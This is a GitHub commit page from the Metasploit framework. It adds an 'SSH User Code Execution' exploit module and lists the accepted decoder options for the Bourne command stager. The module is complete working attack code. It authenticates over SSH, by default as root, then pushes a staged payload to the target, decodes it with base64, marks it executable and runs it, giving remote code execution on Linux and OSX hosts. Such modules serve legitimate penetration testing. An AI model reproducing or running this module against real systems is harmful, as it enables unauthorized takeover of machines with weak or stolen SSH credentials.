Skip to content

Commit d79a3c8

Browse files
committed
list valid DECODER values and add the sshexec module
1 parent 1a98393 commit d79a3c8

File tree

2 files changed

+128
-1
lines changed

2 files changed

+128
-1
lines changed

lib/msf/core/exploit/cmdstager_bourne.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -21,7 +21,7 @@ def initialize(info = {})
2121

2222
register_advanced_options(
2323
[
24-
OptString.new( 'DECODER', [ true, 'The decoding binary to use.', 'base64']),
24+
OptString.new( 'DECODER', [ true, 'The decoding binary to use. (base64, openssl, python, perl)', 'base64']),
2525
], self.class)
2626
end
2727

modules/exploits/multi/ssh/sshexec.rb

Lines changed: 127 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,127 @@
1+
2+
require 'msf/core'
3+
require 'net/ssh'
4+
5+
class Metasploit3 < Msf::Exploit::Remote
6+
Rank = ManualRanking
7+
8+
include Msf::Exploit::CmdStagerBourne
9+
10+
attr_accessor :ssh_socket
11+
12+
def initialize
13+
super(
14+
'Name' => 'SSH User Code Execution',
15+
'Version' => '',
16+
'Description' => %q{
17+
This module utilizes a stager to upload a base64 encoded
18+
binary which is then decoded, chmod'ed and executed from
19+
the command shell.
20+
},
21+
'Author' => ['Spencer McIntyre', 'Brandon Knight'],
22+
'References' =>
23+
[
24+
[ 'CVE', '1999-0502'] # Weak password
25+
],
26+
'License' => MSF_LICENSE,
27+
'Privileged' => true,
28+
'DefaultOptions' =>
29+
{
30+
'PrependFork' => 'true',
31+
'EXITFUNC' => 'process'
32+
},
33+
'Payload' =>
34+
{
35+
'Space' => 4096,
36+
'BadChars' => "",
37+
'DisableNops' => true
38+
},
39+
'Platform' => [ 'osx', 'linux' ],
40+
'Targets' =>
41+
[
42+
[ 'Linux x86',
43+
{
44+
'Arch' => ARCH_X86,
45+
'Platform' => 'linux'
46+
},
47+
],
48+
[ 'Linux x64',
49+
{
50+
'Arch' => ARCH_X86_64,
51+
'Platform' => 'linux'
52+
},
53+
],
54+
[ 'OSX x86',
55+
{
56+
'Arch' => ARCH_X86,
57+
'Platform' => 'osx'
58+
},
59+
],
60+
],
61+
'DefaultTarget' => 0,
62+
# For the CVE
63+
'DisclosureDate' => 'Jan 01 1999'
64+
)
65+
66+
register_options(
67+
[
68+
OptString.new('USERNAME', [ true, "The user to authenticate as.", 'root' ]),
69+
OptString.new('PASSWORD', [ true, "The password to authenticate with.", '' ]),
70+
OptString.new('RHOST', [ true, "The target address" ]),
71+
Opt::RPORT(22)
72+
], self.class
73+
)
74+
75+
register_advanced_options(
76+
[
77+
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false])
78+
]
79+
)
80+
end
81+
82+
def execute_command(cmd, opts)
83+
begin
84+
Timeout.timeout(3) do
85+
self.ssh_socket.exec!(cmd)
86+
end
87+
rescue ::Exception
88+
end
89+
end
90+
91+
def do_login(ip, user, pass, port)
92+
opt_hash = {
93+
:auth_methods => ['password', 'keyboard-interactive'],
94+
:msframework => framework,
95+
:msfmodule => self,
96+
:port => port,
97+
:disable_agent => true,
98+
:password => pass
99+
}
100+
101+
opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
102+
103+
begin
104+
self.ssh_socket = Net::SSH.start(ip, user, opt_hash)
105+
rescue Rex::ConnectionError, Rex::AddressInUse
106+
fail_with(Exploit::Failure::Unreachable, 'Disconnected during negotiation')
107+
rescue Net::SSH::Disconnect, ::EOFError
108+
fail_with(Exploit::Failure::Disconnected, 'Timed out during negotiation')
109+
rescue Net::SSH::AuthenticationFailed
110+
fail_with(Exploit::Failure::NoAccess, 'Failed authentication')
111+
rescue Net::SSH::Exception => e
112+
fail_with(Exploit::Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
113+
end
114+
115+
if not self.ssh_socket
116+
fail_with(Exploit::Failure::Unknown)
117+
end
118+
return
119+
end
120+
121+
def exploit
122+
do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])
123+
124+
print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending Bourne stager...")
125+
execute_cmdstager({:linemax => 500})
126+
end
127+
end

0 commit comments

Comments
 (0)